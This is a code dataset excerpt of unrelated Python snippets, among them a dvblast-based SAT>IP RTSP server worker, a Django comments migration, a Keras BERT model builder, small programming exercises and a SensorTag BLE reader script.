else:
# print " frontEndsDict1", frontEndsDict
# print " clientsDict", clientsDict
# Search for any configured tuner with the frequency that we want to tune to
for frontEnd in frontEndsDict:
if frontEndsDict[frontEnd]['freq'] == chList[clientsDict[self.clientInfo['addr_IP']]['freq']][0]:
cmd = 'dvblastctl -r /tmp/dvblast' + chList[clientsDict[self.clientInfo['addr_IP']]['freq']][0] + frontEnd + '.sock reload'
fLog.write('Info rtspServerWorker: Reloading dvblast configuration 1\n')
self.run_dvblast(cmd)
clientsDict[self.clientInfo['addr_IP']]['dvblastReload'] = False
# Check if this was an abandoned tuner ('0.0.0.0' abandonded IP address) and take ownership if it was
if frontEndsDict[frontEnd]['owner'] == '0.0.0.0':
frontEndsDict[frontEnd]['owner'] = self.clientInfo['addr_IP']
frontEndsDict[frontEnd]['numOwners'] = frontEndsDict[frontEnd]['numOwners'] + 1 # increase the number of owner
clientsDict[self.clientInfo['addr_IP']]['ownerCapabilties'] = True
# print "Info Alex --------------- 1"
# Check if multiple owners ('255.255.255.255' broadcast IP address) and you have ownership capabilities,
# then increase the number of owners by one and remove your ownership capabilities.
if frontEndsDict[frontEnd]['owner'] == '255.255.255.255' and clientsDict[self.clientInfo['addr_IP']]['ownerCapabilties']:
frontEndsDict[frontEnd]['numOwners'] = frontEndsDict[frontEnd]['numOwners'] + 1 # increase the number of owner
clientsDict[self.clientInfo['addr_IP']]['ownerCapabilties'] = False # remove the ownership capability from the client
# print "Info Alex --------------- 2"
# Check if somebody else owne's it and you have ownership capabilities,
# then make the tuner for multiple owners, increase the number of owners and remove your ownership capabilities
elif frontEndsDict[frontEnd]['owner'] != self.clientInfo['addr_IP'] and clientsDict[self.clientInfo['addr_IP']]['ownerCapabilties']:
clientsDict[frontEndsDict[frontEnd]['owner']]['owner'] = False # Remove the ownership capabilities of the previous owner
frontEndsDict[frontEnd]['owner'] = '255.255.255.255' # '255.255.255.255' the IP address for specifying multiple owners
frontEndsDict[frontEnd]['numOwners'] = frontEndsDict[frontEnd]['numOwners'] + 1 # increase the number of owner
clientsDict[self.clientInfo['addr_IP']]['ownerCapabilties'] = False # Remove the ownership capabilties of yourself
# print "Info Alex --------------- 3"
# print " frontEndsDict2", frontEndsDict
break
# If we did not find any tuner that has that frequency configured,then search for any owned tuners
if clientsDict[self.clientInfo['addr_IP']]['dvblastReload']:
for frontEnd in frontEndsDict:
if frontEndsDict[frontEnd]['owner'] == self.clientInfo['addr_IP'] or frontEndsDict[frontEnd]['owner'] == '0.0.0.0':
# Shutdown socket if used
try:
cmd = 'dvblastctl -r /tmp/dvblast' + frontEndsDict[frontEnd]['freq'] + frontEnd + '.sock shutdown'
fLog.write("Info rtspServerWorker: Shutting down dvblast for this tuner\n")
self.run_dvblast(cmd)
# print 'ALEX --- 6'
# ALEX : ----- To be checked
time.sleep(1)
# Alex : -----
except:
print "Info rtspServerWorker: Tried to shut down tuner, however the tuner was not used"
# Cleaning dvblast sockets is any not removed, before creating any other
try:
cmdClean = 'rm -rf /tmp/dvblast' + frontEndsDict[frontEnd]['freq'] + frontEnd + '.sock'
fLog.write("Info rtspServerWorker: Cleaning dvblast sockets, before restarting\n")
os.system(cmdClean)
except:
fLog.write("Info rtspServerWorker: No Cleaning for dvblast sockets, before restarting\n")
# Start dvblast on specified freq
cmd = 'dvblast -a ' + frontEnd[-1] + ' -c dvb-t/pid' + chList[clientsDict[self.clientInfo['addr_IP']]['freq']][0] + '.cfg -f ' + chList[clientsDict[self.clientInfo['addr_IP']]['freq']][0] + ' -b 8 -C -u -r /tmp/dvblast' + chList[clientsDict[self.clientInfo['addr_IP']]['freq']][0] + frontEnd + '.sock'
fLog.write('Info rtspServerWorker: Starting dvblast 2\n')
self.run_dvblast(cmd)
clientsDict[self.clientInfo['addr_IP']]['dvblastReload'] = False
# Assume ownership
if frontEndsDict[frontEnd]['owner'] == '0.0.0.0':
frontEndsDict[frontEnd]['owner'] = self.clientInfo['addr_IP']
frontEndsDict[frontEnd]['numOwners'] = frontEndsDict[frontEnd]['numOwners'] + 1 # increase the number of owners
frontEndsDict[frontEnd]['freq'] = chList[clientsDict[self.clientInfo['addr_IP']]['freq']][0]
freqDict[frontEndsDict[frontEnd]['freq']] = frontEnd
clientsDict[self.clientInfo['addr_IP']]['ownerCapabilties'] = True
# print " frontEndsDict3", frontEndsDict
break
# If we did not fine any owned tuners, then give it one more search before giving up. Search for nonused available tuners.
if clientsDict[self.clientInfo['addr_IP']]['dvblastReload']:
for frontEnd in frontEndsDict:
if frontEndsDict[frontEnd]['freq'] == '':
# Start dvblast on specified freq
cmd = 'dvblast -a ' + frontEnd[-1] + ' -c dvb-t/pid' + chList[clientsDict[self.clientInfo['addr_IP']]['freq']][0] + '.cfg -f ' + chList[clientsDict[self.clientInfo['addr_IP']]['freq']][0] + ' -b 8 -C -u -r /tmp/dvblast' + chList[clientsDict[self.clientInfo['addr_IP']]['freq']][0] + frontEnd + '.sock'
clientsDict[self.clientInfo['addr_IP']]['dvblastReload']= False
fLog.write('Info rtspServerWorker: Starting dvblast 3\n')
self.run_dvblast(cmd)
frontEndsDict[frontEnd]['freq'] = chList[clientsDict[self.clientInfo['addr_IP']]['freq']][0]
frontEndsDict[frontEnd]['owner'] = self.clientInfo['addr_IP']
frontEndsDict[frontEnd]['numOwners'] = frontEndsDict[frontEnd]['numOwners'] + 1 # increase the number of owner
freqDict[frontEndsDict[frontEnd]['freq']] = frontEnd
clientsDict[self.clientInfo['addr_IP']]['ownerCapabilties'] = True
# print " frontEndsDict4", frontEndsDict
break
# Remove corresponding pid from config file and reload for sat>ip app
if clientsDict[self.clientInfo['addr_IP']]['stream'] and delPids and delPid:
try:
f = open('dvb-t/pid' + chList[clientsDict[self.clientInfo['addr_IP']]['freq']][0] + '.cfg', 'r')
lines = f.readlines()
f.close()
f = open('dvb-t/pid' + chList[clientsDict[self.clientInfo['addr_IP']]['freq']][0] + '.cfg', 'w')
lineToCompare = self.clientInfo['addr_IP']
for line in lines:
match_line = re.search(lineToCompare, line)
if not match_line:
f.write(line)
lineToGet = line.split('\t')
# print "Info rtspServerWorker: lineToGet", lineToGet
f.close()
cmd = 'dvblastctl -r /tmp/dvblast' + chList[clientsDict[self.clientInfo['addr_IP']]['freq']][0] + freqDict[chList[clientsDict[self.clientInfo['addr_IP']]['freq']][0]] + '.sock reload'
fLog.write('Info rtspServerWorker: Reloading dvblast configuration 3\n')
self.run_dvblast(cmd)
try:
# Update the number of owners of frontEnd
if (frontEndsDict[freqDict[chList[clientsDict[self.clientInfo['addr_IP']]['freq']][0]]]['owner'] == '255.255.255.255' or frontEndsDict[freqDict[chList[clientsDict[self.clientInfo['addr_IP']]['freq']][0]]]['owner'] == self.clientInfo['addr_IP']) and frontEndsDict[freqDict[chList[clientsDict[self.clientInfo['addr_IP']]['freq']][0]]]['numOwners'] >= 1:
frontEndsDict[freqDict[chList[clientsDict[self.clientInfo['addr_IP']]['freq']][0]]]['numOwners'] = frontEndsDict[freqDict[chList[clientsDict[self.clientInfo['addr_IP']]['freq']][0]]]['numOwners'] - 1
clientsDict[self.clientInfo['addr_IP']]['ownerCapabilties'] = True # Make sure that the client has ownership capabilties
except:
print "Info rtspServerWorker: No adapters configured with that freq 3 "
try:
# If we have only one client connected left, then the last client takes the ownership of the tuner
if frontEndsDict[freqDict[chList[clientsDict[self.clientInfo['addr_IP']]['freq']][0]]]['numOwners'] == 1 and frontEndsDict[freqDict[chList[clientsDict[self.clientInfo['addr_IP']]['freq']][0]]]['owner'] == '255.255.255.255' :
frontEndsDict[freqDict[chList[clientsDict[self.clientInfo['addr_IP']]['freq']][0]]]['owner'] = lineToGet[0][:-(len(clientsDict[self.clientInfo['addr_IP']]['rtpPort'])+1)] # The last client that will remain in the clientsDict has to take ownership (lineToGet[0] = ip_add:port_num)
# print " frontEndsDict8", frontEndsDict
except:
print "Info rtspServerWorker: No adapters configured with that freq 4 "
# print " frontEndsDict9", frontEndsDict
except:
# print "Info rtspServerWorker: Processing PLAY DELETE PIDS\n"
fLog.write("Info rtspServerWorker: Processing PLAY DELETE PIDS\n")
# Process TEARDOWN request
elif requestType == self.TEARDOWN:
# print "=========freqDict 1=======", freqDict
fLog.write("Info rtspServerWorker: Processing TEARDOWN, New State: INI\n")
try:
f = open('dvb-t/pid' + chList[clientsDict[self.clientInfo['addr_IP']]['freq']][0] + '.cfg', 'r')
lines = f.readlines()
f.close()
f = open('dvb-t/pid' + chList[clientsDict[self.clientInfo['addr_IP']]['freq']][0] + '.cfg', 'w')
lineToCompare = self.clientInfo['addr_IP']
for line in lines:
match_line = re.search(lineToCompare, line)
if not match_line:
f.write(line)
f.close()
cmd = 'dvblastctl -r /tmp/dvblast' + chList[clientsDict[self.clientInfo['addr_IP']]['freq']][0] + freqDict[chList[clientsDict[self.clientInfo['addr_IP']]['freq']][0]] + '.sock reload'
fLog.write('Info rtspServerWorker: Reloading dvblast configuration 4\n')
self.run_dvblast(cmd)
except:
# print "Info rtspServerWorker: processing TEARDOWN NONE\n"
# print " frontEndsDict7", frontEndsDict
fLog.write("Info rtspServerWorker: processing TEARDOWN NONE\n")
try:
# Update the number of owners of frontEnd
if frontEndsDict[freqDict[chList[clientsDict[self.clientInfo['addr_IP']]['freq']][0]]]['numOwners'] >= 1:
frontEndsDict[freqDict[chList[clientsDict[self.clientInfo['addr_IP']]['freq']][0]]]['numOwners'] = frontEndsDict[freqDict[chList[clientsDict[self.clientInfo['addr_IP']]['freq']][0]]]['numOwners'] - 1
except:
print "Info rtspServerWorker: No adapters configured with that freq 1 "
try:
# If we have only one client connected left, then the last client takes the ownership of the tuner
if frontEndsDict[freqDict[chList[clientsDict[self.clientInfo['addr_IP']]['freq']][0]]]['numOwners'] == 1:
if clientsDict.keys()[0] == self.clientInfo['addr_IP']:
frontEndsDict[freqDict[chList[clientsDict[self.clientInfo['addr_IP']]['freq']][0]]]['owner'] = clientsDict.keys()[1] # The last client that will remain in the clientsDict has to take ownership
else:
frontEndsDict[freqDict[chList[clientsDict[self.clientInfo['addr_IP']]['freq']][0]]]['owner'] = clientsDict.keys()[0] # The last client that will remain in the clientsDict has to take ownership
print " frontEndsDict6", frontEndsDict
except:
print "Info rtspServerWorker: No adapters configured with that freq 2 "
try:
# If we do not have anymore clients connected, then remove the entry from the freqDict
if frontEndsDict[freqDict[chList[clientsDict[self.clientInfo['addr_IP']]['freq']][0]]]['numOwners'] == 0:
print "removed freqDict"
del freqDict[chList[clientsDict[self.clientInfo['addr_IP']]['freq']][0]]
except:
fLog.write("Info rtspServerWorker: entry in the freqDict already removed\n")
# Get the session value before deleting the client entry, for replay purpose
# session = clientsDict[self.clientInfo['addr_IP']]['session']
# try:
# del freqDict[chList[clientsDict[self.clientInfo['addr_IP']]['freq']][0]]
# except:
# fLog.write("Info rtspServerWorker: entry in the freqDict already removed\n")
# Remove client from dictinary
# del clientsDict[self.clientInfo['addr_IP']]
# print "=========freqDict 2=======", freqDict
self.replyRtsp(self.OK_200_TEARDOWN, seq[1])
# Process OPTIONS request
elif requestType == self.OPTIONS:
fLog.write("Info rtspServerWorker: Processing OPTIONS\n")
self.replyRtsp(self.OK_200_OPTIONS, seq[1])
# Process DESCRIBE request
elif requestType == self.DESCRIBE:
if clientsDict[self.clientInfo['addr_IP']]['session'] == '':
fLog.write("Info rtspServerWorker: Processing DESCRIBE NONE\n")
self.replyRtsp(self.OK_404_DESCRIBE, seq[1])
else:
if clientsDict[self.clientInfo['addr_IP']]['dvblastReload']:
fLog.write("Info rtspServerWorker: Processing DESCRIBE SIGNAL\n")
self.replyRtsp(self.OK_200_DESCRIBE, seq[1])
else:
fLog.write("Info rtspServerWorker: Processing DESCRIBE NO SIGNAL\n")
self.replyRtsp(self.OK_200_DESCRIBE_NOSIGNAL, seq[1])
# Process CLOSE_CONNETION request
elif requestType == self.CLOSE_CONNETION:
fLog.write("Info rtspServerWorker: Processing CLOSE_CONNETION\n")
self.SERVER_RUNNING = 0
self.replyRtsp(self.CLOSING_CONNECTION, seq[1])
fLog.close()
    def run_dvblast(self, cmd):
        # Launch a dvblast/dvblastctl command line asynchronously.
        # stdout/stderr are redirected into the shared log file handle.
        global fLog
        # NOTE(review): shell=True with a pre-built command string -- the
        # pieces come from internal channel/frequency tables, but confirm
        # they can never contain shell metacharacters.
        proc = Popen([cmd], stdout=fLog, stderr=fLog, shell=True)
    def updateChList(self):
        # Refresh the module-level channel list from its on-disk source.
        global chList
        # Get chList
        chList = getChList()
    def replyRtsp(self, code, seq):
        """Send RTSP reply to the client.

        code -- one of the class-level reply constants (OK_200_*, etc.)
        seq  -- the CSeq value echoed back to the client.

        Side effects: writes to the client's RTSP socket, appends to the
        shared log file, and toggles self.SERVER_RUNNING (only the
        SETUP-with-PIDs branch keeps the worker alive).
        """
        # global session
        global fLog
        # OPTIONS: advertise the supported RTSP methods.
        if code == self.OK_200_OPTIONS:
            reply = 'RTSP/1.0 200 OK\r\nPublic:OPTIONS,SETUP,PLAY,TEARDOWN,DESCRIBE\r\nCSeq:1\r\n\r\n'
            connSocket = self.clientInfo['rtspSocket']
            connSocket.send(reply)
            self.SERVER_RUNNING = 0
        # Error messages
        elif code == self.FILE_NOT_FOUND_404:
            print "Info rtspServerWorker: 404 NOT FOUND\n"
            fLog.write("Info rtspServerWorker: 404 NOT FOUND\n")
        elif code == self.CON_ERR_500:
            print "Info rtspServerWorker: 500 CONNECTION ERROR\n"
            fLog.write("Info rtspServerWorker: 500 CONNECTION ERROR\n")
        # DESCRIBE with a locked signal: build an SDP body for the stream.
        elif code == self.OK_200_DESCRIBE:
            ipServer = getServerIP()
            unicastIp = '0.0.0.0'
            serverID = 1
            serverTunerNr = len(frontEndsDict)
            # NOTE(review): fixed values -- compare with the all-zero
            # tunerValues in the NOSIGNAL branch below; presumably these
            # encode signal level/lock/quality, confirm against SAT>IP spec.
            tunerValues = '1,123,1,3,'
            tunerValues2 = ',' + clientsDict[self.clientInfo['addr_IP']]['pol'] + ',' + clientsDict[self.clientInfo['addr_IP']]['msys'] + ',' + clientsDict[self.clientInfo['addr_IP']]['mtype'] + ',' + clientsDict[self.clientInfo['addr_IP']]['plts'] + ',' + clientsDict[self.clientInfo['addr_IP']]['ro'] + ',' + clientsDict[self.clientInfo['addr_IP']]['sr'] + ',' + clientsDict[self.clientInfo['addr_IP']]['fec']
            sdpString = 'v=0\r\no=- 534863118 534863118 IN IP4 %s\ns=SatIPServer:%d %d\r\nt=0 0\r\nm=video 0 RTP/AVP 33\r\nc=IN IP4 %s\na=control:stream=%d\na=fmtp:33 ver=1.0;scr=1;tuner=%s%s.00%s\na=%s\n' % (ipServer, serverID, serverTunerNr, unicastIp, clientsDict[self.clientInfo['addr_IP']]['stream'], tunerValues, clientsDict[self.clientInfo['addr_IP']]['freq'], tunerValues2, clientsDict[self.clientInfo['addr_IP']]['status'])
            sdpLen = len(sdpString)
            rtspString = 'RTSP/1.0 200 OK\r\nContent-length:%d\r\nContent-type:application/sdp\r\nContent-Base:rtsp://%s/\nCSeq:%s\nSession:%s\r\n\r\n' % (sdpLen, self.clientInfo['addr_IP'], seq, clientsDict[self.clientInfo['addr_IP']]['session'])
            # Make the reply from the two parts: rtspString and sdpString
            reply = rtspString + sdpString
            connSocket = self.clientInfo['rtspSocket']
            connSocket.send(reply)
            self.SERVER_RUNNING = 0
            fLog.write("Info rtspServerWorker: 200 DESCRIBE\n")
        # DESCRIBE without signal lock: same SDP layout, zeroed tuner values.
        elif code == self.OK_200_DESCRIBE_NOSIGNAL:
            ipServer = getServerIP()
            unicastIp = '0.0.0.0'
            serverID = 1
            serverTunerNr = len(frontEndsDict)
            tunerValues = '1,0,0,0,'
            tunerValues2 = ',' + clientsDict[self.clientInfo['addr_IP']]['pol'] + ',' + clientsDict[self.clientInfo['addr_IP']]['msys'] + ',' + clientsDict[self.clientInfo['addr_IP']]['mtype'] + ',' + clientsDict[self.clientInfo['addr_IP']]['plts'] + ',' + clientsDict[self.clientInfo['addr_IP']]['ro'] + ',' + clientsDict[self.clientInfo['addr_IP']]['sr'] + ',' + clientsDict[self.clientInfo['addr_IP']]['fec']
            sdpString = 'v=0\r\no=- 534863118 534863118 IN IP4 %s\ns=SatIPServer:%d %d\r\nt=0 0\r\nm=video 0 RTP/AVP 33\r\nc=IN IP4 %s\na=control:stream=%d\na=fmtp:33 ver=1.0;scr=1;tuner=%s%s.00%s\na=%s\n' % (ipServer, serverID, serverTunerNr, unicastIp, clientsDict[self.clientInfo['addr_IP']]['stream'], tunerValues, clientsDict[self.clientInfo['addr_IP']]['freq'], tunerValues2, clientsDict[self.clientInfo['addr_IP']]['status'])
            sdpLen = len(sdpString)
            rtspString = 'RTSP/1.0 200 OK\r\nContent-length:%d\r\nContent-type:application/sdp\r\nContent-Base:rtsp://%s/\nCSeq:%s\nSession:%s\r\n\r\n' % (sdpLen, self.clientInfo['addr_IP'], seq, clientsDict[self.clientInfo['addr_IP']]['session'])
            # Make the reply from the two parts: rtspString and sdpString
            reply = rtspString + sdpString
            connSocket = self.clientInfo['rtspSocket']
            connSocket.send(reply)
            fLog.write("Info rtspServerWorker: 200 DESCRIBE NOSIGNAL\n")
            self.SERVER_RUNNING = 0
        # DESCRIBE before any SETUP: no session yet, report 404.
        elif code == self.OK_404_DESCRIBE:
            reply = 'RTSP/1.0 404 Not Found\r\nCSeq:%s\n\r\n' % (seq)
            connSocket = self.clientInfo['rtspSocket']
            connSocket.send(reply)
            fLog.write("Info rtspServerWorker: 404 DESCRIBE\n")
            self.SERVER_RUNNING = 0
        # SETUP without pids: return session id + stream id + transport.
        elif code == self.OK_200_SETUP:
            reply = 'RTSP/1.0 200 OK\r\nSession:%s;timeout=30\r\ncom.ses.streamID:%d\r\nTransport: RTP/AVP;unicast;destination=%s;client_port=5004-5005\r\nCSeq:%s\n\r\n' % (clientsDict[self.clientInfo['addr_IP']]['session'], clientsDict[self.clientInfo['addr_IP']]['stream'], self.clientInfo['addr_IP'], seq)
            connSocket = self.clientInfo['rtspSocket']
            connSocket.send(reply)
            fLog.write("Info rtspServerWorker: 200 SETUP\n")
            self.SERVER_RUNNING = 0
        # SETUP with pids: same reply, but keep the worker loop running.
        elif code == self.OK_200_SETUP_PIDS:
            reply = 'RTSP/1.0 200 OK\r\nSession:%s;timeout=30\r\ncom.ses.streamID:%d\r\nTransport: RTP/AVP;unicast;destination=%s;client_port=5004-5005\r\nCSeq:%s\r\n\r\n' % (clientsDict[self.clientInfo['addr_IP']]['session'], clientsDict[self.clientInfo['addr_IP']]['stream'], self.clientInfo['addr_IP'], seq)
            connSocket = self.clientInfo['rtspSocket']
            connSocket.send(reply)
            fLog.write("Info rtspServerWorker: 200 SETUP PID\n")
            self.SERVER_RUNNING = 1
        elif code == self.OK_200_PLAY:
            reply = 'RTSP/1.0 200 OK\r\nRTP-Info:url=//%s/stream=%d;seq=50230\r\nCSeq:%s\nSession:%s\r\n\r\n' % (self.clientInfo['addr_IP'], clientsDict[self.clientInfo['addr_IP']]['stream'], seq, clientsDict[self.clientInfo['addr_IP']]['session'])
            connSocket = self.clientInfo['rtspSocket']
            connSocket.send(reply)
            fLog.write("Info rtspServerWorker: 200 PLAY\n")
            self.SERVER_RUNNING = 0
        # TEARDOWN: acknowledge, then forget the client entirely.
        elif code == self.OK_200_TEARDOWN:
            reply = 'RTSP/1.0 200 OK\r\nContent-length:0\r\nCSeq:%s\nSession:%s\r\n\r\n' % (seq, clientsDict[self.clientInfo['addr_IP']]['session'])
            connSocket = self.clientInfo['rtspSocket']
            connSocket.send(reply)
            # Remove client from dictinary
            del clientsDict[self.clientInfo['addr_IP']]
            fLog.write("Info rtspServerWorker: 200 TEARDOWN\n")
            self.SERVER_RUNNING = 0
| StarcoderdataPython |
1612371 | from django.core.management.base import NoArgsCommand
from django.db import transaction, connection
from django.conf import settings
PATH_DIGITS = getattr(settings, 'COMMENT_PATH_DIGITS', 10)
SQL = """
INSERT INTO threadedcomments_comment (
comment_ptr_id,
parent_id,
last_child_id,
tree_path,
title
)
SELECT id as comment_ptr_id,
null as parent_id,
null as last_child_id,
(SELECT TO_CHAR(id, '%s')) AS tree_path,
''
FROM django_comments;
""" % ''.zfill(PATH_DIGITS)
class Command(NoArgsCommand):
    """Management command that runs the migration SQL inside one transaction."""

    help = "Migrates from django.contrib.comments to django-threadedcomments"

    def handle(self, *args, **options):
        # Manual transaction management (pre-Django-1.6 API): flush any
        # pending auto-commit work, take over, run the bulk INSERT, commit.
        transaction.commit_unless_managed()
        transaction.enter_transaction_management()
        transaction.managed(True)
        cursor = connection.cursor()
        cursor.execute(SQL)
        transaction.commit()
        transaction.leave_transaction_management()
| StarcoderdataPython |
174318 | import numpy as np
import tensorflow as tf
from tensorflow.keras.layers import Dense, Input
from tensorflow.keras.models import Model
def build_model(bert_layer, max_len=512):
    """Wrap *bert_layer* in a Keras model that outputs the [CLS] embedding.

    The model takes the three standard BERT inputs (word ids, attention
    mask, segment ids), each of length ``max_len``, and returns the first
    token's vector from the layer's sequence output.
    """
    input_names = ('input_word_ids', 'input_mask', 'segment_ids')
    bert_inputs = [
        Input(shape=(max_len, ), dtype=tf.int32, name=name)
        for name in input_names
    ]
    # bert_layer returns (pooled_output, sequence_output); keep the latter.
    _, seq_output = bert_layer(bert_inputs)
    # Slice out the [CLS] position as the classification representation.
    cls_vector = seq_output[:, 0, :]
    return Model(inputs=bert_inputs, outputs=cls_vector)
| StarcoderdataPython |
4815517 | <reponame>sergio-ivanuzzo/idewave-core<gh_stars>1-10
from struct import pack
from World.Object.Unit.Player.PlayerManager import PlayerManager
from World.WorldPacket.Constants.WorldOpCode import WorldOpCode
from Server.Connection.Connection import Connection
class Logout(object):
    """Logout request handler: persists the player and builds the reply."""

    def __init__(self, **kwargs):
        # Raw packet payload; defaults to an empty byte string.
        self.data = kwargs.pop('data', bytes())
        # The originating connection is mandatory (KeyError if absent).
        self.connection: Connection = kwargs.pop('connection')

    async def process(self) -> tuple:
        """Save the connection's player and return the SMSG_LOGOUT_RESPONSE."""
        with PlayerManager() as player_mgr:
            player_mgr.set(self.connection.player).save()

        # Reason (uint32) and instant-logout flag (uint8), both zero.
        payload = pack('<IB', 0, 0)
        return WorldOpCode.SMSG_LOGOUT_RESPONSE, [payload]
| StarcoderdataPython |
3366591 | #a
# Linear scan for the smallest element of L and its (last updated) index.
# NOTE(review): L is never defined in this snippet -- as written it raises
# NameError when run standalone; it assumes a list L exists in the session.
index=0
smallest=L[0]
for i in range(1,len(L)):
    if L[i] < smallest:
        smallest=L[i]
        index = i
#b
def min_index(L: list) -> tuple:
    """ (list) -> (object, int)

    Return the smallest item of L together with the index of its first
    occurrence.  Raises IndexError on an empty list.

    >>> min_index([4, 3, 2, 4, 3, 6, 1, 5])
    (1, 6)
    """
    best_pos = 0
    for pos, item in enumerate(L):
        # Strict comparison keeps the FIRST occurrence on ties.
        if item < L[best_pos]:
            best_pos = pos
    return (L[best_pos], best_pos)

print(min_index([4, 3, 2, 4, 3, 6, 1, 5]))
#c
def min_or_max_index(L: list, P: bool) -> tuple:
    """ (list, bool) -> (object, int)

    Return the minimum of L (if P is true) or the maximum (if P is false),
    together with the index of its first occurrence.  Raises IndexError on
    an empty list.

    >>> min_or_max_index([4, 3, 2, 4, 3, 6, 1, 5], True)
    (1, 6)
    >>> min_or_max_index([4, 3, 2, 4, 3, 6, 1, 5], False)
    (6, 5)
    """
    index = 0
    extreme = L[0]
    for i in range(1, len(L)):
        # Strict comparisons keep the FIRST occurrence on ties, exactly
        # like the two duplicated branches this single loop replaces.
        better = L[i] < extreme if P else L[i] > extreme
        if better:
            extreme = L[i]
            index = i
    return (extreme, index)

print(min_or_max_index([4, 3, 2, 4, 3, 6, 1, 5],False))
| StarcoderdataPython |
1779154 | <reponame>Erebuxy/project_euler<filename>000-100/039/main.py
#!/usr/bin/env python3
import sys
import math
sys.path.insert(0, '../../')
import util
if __name__ == '__main__':
    # Project Euler 39: for perimeters p <= 1000, find the p that admits
    # the most integer-sided right triangles with i^2 = j^2 + k^2 and
    # i + j + k = p.
    limit = 1000
    max_count = 0
    max_p = -1
    # Step by 2: a + b + c of a Pythagorean triple is always even, so odd
    # perimeters can be skipped outright.
    for p in range(4, limit+1, 2):
        count = 0
        # i is the hypotenuse candidate; it must lie between p/3 (it is
        # the longest side) and p/2 (triangle inequality).
        for i in range(int(p/3), math.ceil(p/2)):
            for j in range(1, i):
                k = p - i - j
                if i**2 == j**2 + k**2:
                    count += 1
        if count > max_count:
            max_count = count
            max_p = p
    print(max_p)
| StarcoderdataPython |
1654168 | <gh_stars>0
class BankAccount:
    """A minimal interactive bank account with deposit/withdraw bookkeeping."""

    # Class-level defaults; the methods below shadow them with instance
    # attributes on first assignment.
    account_number = 0
    name = ""
    balance_amount = 0

    def account_creation(self):
        """Prompt the operator for the account number and holder name."""
        self.account_number = int(input("Enter the account number\t"))
        self.name = input("Enter the account holder name\t")

    def amount_deposition(self, amount):
        """Credit *amount* to the current balance."""
        self.balance_amount += amount

    def amount_withdrawn(self, amount):
        """Debit *amount* if the balance covers it, otherwise report failure."""
        if amount > self.balance_amount:
            print("Less Ammount")
        else:
            self.balance_amount -= amount

    def display_account(self):
        """Print a one-line summary of the account."""
        print("Name: ",self.name,"\tAccount Number: ",self.account_number,"\tBalance: ",self.balance_amount)
# Interactive menu loop driving a single BankAccount instance.
# The while-condition is effectively decorative: option 5 exits via break.
ch=''
acc=BankAccount()
while ch!=5:
    print("\tMAIN MENU\t")
    print("\t1. NEW ACCOUNT\t")
    print("\t2. DEPOSIT AMOUNT\t")
    print("\t3. WITHDRAW AMOUNT\t")
    print("\t4. BALANCE ENQUIRY\t")
    print("\t5. EXIT\t")
    # NOTE(review): int(input()) raises ValueError on non-numeric input;
    # there is no validation here.
    ch=int(input())
    if ch==1:
        acc.account_creation()
    elif ch==2:
        # NOTE(review): "Test" looks like leftover debug output.
        print("Test")
        acc.amount_deposition(int(input()))
    elif ch==3:
        acc.amount_withdrawn(int(input()))
    elif ch==4:
        acc.display_account()
    elif ch==5:
        break
| StarcoderdataPython |
1774116 | #!/usr/bin/python
# -*- coding: utf-8 -*-
import pexpect
import time
from datetime import datetime
# TI SensorTag GATT UUID scheme: full UUID = F000<short>-0451-4000-B000-...
uuid_pre = "F000"
uuid_pos = "-0451-4000-B000-000000000000"

#format: handle = [data, config]
temp_uuid = ["AA01", "AA02"]
move_uuid = ["AA81", "AA82"]
humd_uuid = ["AA21", "AA22"]
baro_uuid = ["AA41", "AA42"]
opti_uuid = ["AA71", "AA72"]
leds_uuid = ["AA65", "AA66"]

# Target device and the gatttool interactive prompt (regex) to expect.
sensor_mac = "B0:B4:48:C0:CA:03"
prompt = "\[CON\]\[" + sensor_mac + "\]\[LE\]>"
# When True, the status LEDs are never driven (see set_led/init_led).
stealth_mode = False
active_sensors = [temp_uuid, move_uuid, humd_uuid, baro_uuid, opti_uuid]
# Filled at startup: maps full characteristic UUID -> char value handle.
sensor_uuid_to_cvh = {}

def log(data):
    # Append a line to log.txt and echo it to stdout.
    f = open("log.txt", "a")
    f.write(data + "\n")
    print data
    f.close()

def turn_sensor_on(cnfg, hnd):
    # Write value `hnd` to the configuration characteristic `cnfg`.
    child.sendline("char-write-cmd " + sensor_uuid_to_cvh[uuid_pre + cnfg + uuid_pos] + " " + hnd)
    child.expect(prompt)

def turn_sensor_off(cnfg, hnd):
    # Identical to turn_sensor_on; kept separate for call-site readability.
    child.sendline("char-write-cmd " + sensor_uuid_to_cvh[uuid_pre + cnfg + uuid_pos] + " " + hnd)
    child.expect(prompt)

def read_sensor_data(data):
    # Read a data characteristic; returns the hex byte string after
    # "Characteristic value/descriptor: " in gatttool's output.
    child.sendline("char-read-hnd " + sensor_uuid_to_cvh[uuid_pre + data + uuid_pos])
    child.expect(prompt)
    child.before
    child.expect(prompt)
    data = child.before
    return data.strip().split(": ")[1]
def print_temp_data(value):
    # Decode the IR temperature characteristic: two little-endian 16-bit
    # words (object temp, ambient temp); value is 14-bit, 0.03125 C/LSB.
    SCALE_LSB = 0.03125
    value = value.split(" ")
    obj_temp = "0x" + value[1] + value[0]
    amb_temp = "0x" + value[3] + value[2]
    # (float)(...) is just Python's float() written C-style.
    obj_temp_cel = (float)(int(obj_temp, 16) >> 2) * SCALE_LSB
    amb_temp_cel = (float)(int(amb_temp, 16) >> 2) * SCALE_LSB
    obj_temp_fah = obj_temp_cel * (9.0/5.0) + 32.0
    amb_temp_fah = amb_temp_cel * (9.0/5.0) + 32.0
    log("IR TEMPERATURE")
    log("\tOBJECT\t\t: " + str(obj_temp_cel) + "°C" + " | " + str(obj_temp_fah) + "°F")
    log("\tAMBIENT\t\t: " + str(amb_temp_cel) + "°C" + " | " + str(amb_temp_fah) + "°F")

def print_move_data(value):
    # Decode the MPU9250 movement characteristic: nine little-endian
    # 16-bit words (gyro xyz, accel xyz, mag xyz).
    # NOTE(review): int(hex, 16) yields an UNSIGNED value; negative sensor
    # readings (two's complement) are not sign-extended here, so readings
    # above 0x7FFF come out as large positive numbers -- verify intended.
    value = value.split(" ")
    gyro_x = "0x" + value[1] + value[0]
    gyro_y = "0x" + value[3] + value[2]
    gyro_z = "0x" + value[5] + value[4]
    acc_x = "0x" + value[7] + value[6]
    acc_y = "0x" + value[9] + value[8]
    acc_z = "0x" + value[11] + value[10]
    mag_x = "0x" + value[13] + value[12]
    mag_y = "0x" + value[15] + value[14]
    mag_z = "0x" + value[17] + value[16]
    # Gyro full scale: +/-250 dps -> 500 dps span over 16 bits.
    gyro_x_dps = (((float)(int(gyro_x, 16))) * 1.0) / (65536.0 / 500.0)
    gyro_y_dps = (((float)(int(gyro_y, 16))) * 1.0) / (65536.0 / 500.0)
